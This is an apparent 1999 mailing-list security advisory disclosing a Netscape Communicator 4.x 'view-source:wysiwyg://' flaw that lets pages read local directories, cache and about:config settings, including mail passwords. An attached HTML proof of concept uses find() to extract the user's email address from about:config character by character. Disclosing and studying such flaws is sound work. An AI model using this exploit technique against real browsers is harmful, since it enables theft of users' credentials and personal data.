Date: Tue, 1 Jun 1999 19:08:49 +0300
From: Georgi Guninski <[email protected]>
To: [email protected]Subject: Netscape Communicator "view-source:" security vulnerabilities
This is a multi-part message in MIME format.
--------------6718BA18997C30F69282E3B5
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
There is a security vulnerability in Netscape Communicator 4.6 Win95,
4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them
in a "view-source" window.
The problem is that it allows access to documents included in the parent
document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading
the whole parsed document.
Vulnerabilites:
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's
email address, mail servers and password.
Probably others
This vulnerability may be exploited by using HTML email message.
Workaround: Disable JavaScript
Netscape is notified about the problem.
Demonstration is available at: http://www.nat.bg/~joro/viewsource.html
Regards,
Georgi Guninski
http://www.nat.bg/~jorohttp://www.whitehats.com/guninski
--------------6718BA18997C30F69282E3B5
Content-Type: text/html; charset=koi8-r;
name="viewsource.html"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="viewsource.html"
<HTML>
<BODY>
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
The problem is that it allows access to documents included in the parent document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
<BR>
Vulnerabilites:
<HR>
Browsing local directories<BR>
Reading user's cache<BR>
Reading parsed HTML files<BR>
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
Probably others<BR>
<BR>
This vulnerability may be exploited by using HTML email message.
<HR>
Workaround: Disable JavaScript
<HR>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread+1"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;
</SCRIPT>
</BODY>
</HTML>
--------------6718BA18997C30F69282E3B5--
